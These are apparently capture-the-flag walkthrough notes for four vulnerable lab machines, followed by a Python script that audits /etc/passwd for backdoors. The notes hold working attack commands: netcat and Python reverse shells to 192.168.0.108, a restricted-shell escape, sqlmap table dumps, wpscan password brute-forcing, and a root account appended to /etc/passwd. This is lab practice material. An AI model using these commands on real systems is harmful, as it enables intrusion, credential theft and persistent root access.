Contents
web-developer-1,288
1. Port scan
2. Log in to JAMES-Admin remotely with nc
3. Log in to POP3 remotely with nc and read the mail
The mindy user's mailbox contains SSH login credentials
4. Log in over SSH; mindy's shell turns out to be a restricted shell
ssh 192.168.0.109 -l mindy "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/sh\")'"
5. Privilege escalation
echo 'import os; os.system("/bin/nc 192.168.0.108 5588 -e /bin/bash")' > /opt/tmp.py
python tmp.py
hackme-1,330
1. Port scan
2. After registering and logging in, the search page has a SQL injection vulnerability
sqlmap -r 1.txt -D webapphacking -T users --columns --dump-all --batch
After logging in as the superadmin, an upload page is found
3. Upload a PHP file
4. Privilege escalation
dc-6,315
1. Add a hosts entry
2. Enumerate WordPress usernames and brute-force the passwords
wpscan --url http://wordy/ --enumerate
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wc -l passwords.txt
wpscan --url http://wordy -U name.txt -P passwords.txt
3. Activity Monitor vulnerability exploitation
Modify the exploit
4. Search for sensitive files; graham's password is found
5. Check the reverse shell under jens
graham@dc-6:/home/jens$ cat /dev/null > backups.sh
graham@dc-6:/home/jens$ echo "/bin/bash" >> backups.sh
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh # running the script as the jens user yields a shell
6. Privilege escalation via nmap
misdirection-1,371
1. Port scan
2. Brute-force web directories
http://192.168.0.104:8080/debug/ is a web shell
3. Reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.108",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4. Modify the passwd file
brexit@misdirection:/etc$ openssl passwd -1 123456
$1$9NYamCnE$3NdQF1dU1bfbo1MTayr0H1
brexit@misdirection:/etc$ echo 'abc:$1$9NYamCnE$3NdQF1dU1bfbo1MTayr0H1:0:0::/root:/bin/bash' >> /etc/passwd
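As an added example that is not part of these notes: a small audit script for the kind of /etc/passwd backdoor shown in the misdirection step, flagging extra UID-0 accounts, password hashes stored in passwd instead of /etc/shadow, and non-root accounts whose home is /root. The sample passwd contents are constructed and include the entry from the step above.

```python
from collections import Counter

# Constructed sample: a normal passwd file plus the backdoor entry from the notes.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
brexit:x:1000:1000:brexit:/home/brexit:/bin/bash
abc:$1$9NYamCnE$3NdQF1dU1bfbo1MTayr0H1:0:0::/root:/bin/bash
"""


def audit_passwd(text):
    """Return a list of (rule, subject) findings for suspicious passwd entries."""
    findings = []
    uids = Counter()
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:  # passwd lines always have exactly seven fields
            findings.append(("malformed_line", line))
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        rows.append((name, pw, uid, gid, home, shell))
        uids[uid] += 1
    for name, pw, uid, gid, home, shell in rows:
        # Any UID-0 account other than root is a second root login.
        if uid == "0" and name != "root":
            findings.append(("extra_uid0", name))
        # A real hash in field 2 (not x/*/!) bypasses /etc/shadow entirely.
        if pw not in ("x", "*", "!", "!!", ""):
            findings.append(("hash_in_passwd", name))
        elif pw == "":
            findings.append(("empty_password", name))
        # A non-root account pointed at root's home directory.
        if home == "/root" and name != "root":
            findings.append(("root_home", name))
    for uid, count in uids.items():
        if count > 1:
            findings.append(("duplicate_uid", uid))
    return findings


if __name__ == "__main__":
    for rule, subject in audit_passwd(SAMPLE_PASSWD):
        print(f"{rule}: {subject}")
```

Run it against the real file with `audit_passwd(open("/etc/passwd").read())`; a clean host returns an empty list.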